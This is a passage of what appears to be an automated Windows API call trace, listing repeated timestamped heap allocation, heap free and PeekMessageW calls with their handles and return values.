lpMsg=0x7df8b4) returned 0 [0119.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0119.817] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef740 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0119.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0119.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0119.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef740 | out: hHeap=0x12c0000) returned 1 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c18 [0119.817] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.817] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c18 | out: hHeap=0x12c0000) returned 1 [0119.817] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0119.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0119.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0119.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0119.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0119.818] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0119.818] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef760 [0119.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0119.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458fd8 [0119.818] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.818] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458fd8 | out: hHeap=0x12c0000) returned 1 [0119.818] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.818] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0119.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0119.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0119.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0119.819] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0119.819] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef760 [0119.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0119.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0119.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0119.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0119.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0119.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0119.819] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.819] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0119.819] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.819] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0119.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0119.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c18 [0119.820] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.820] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0119.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0119.820] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0119.821] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.821] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d98 [0119.821] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.821] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f98 [0119.821] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.821] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.821] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0119.822] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.822] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0119.822] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.822] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c18 [0119.822] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.822] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0119.822] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0119.822] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.822] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0119.823] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.823] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0119.823] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.823] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a58 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b58 [0119.823] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.823] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0119.823] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f98 [0119.824] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.824] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491838 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458958 [0119.824] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.824] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b58 [0119.824] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.824] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0119.824] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0119.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0119.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0119.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0119.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0119.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.825] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.825] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.826] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.826] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.826] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.826] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.826] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.829] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.830] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.831] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 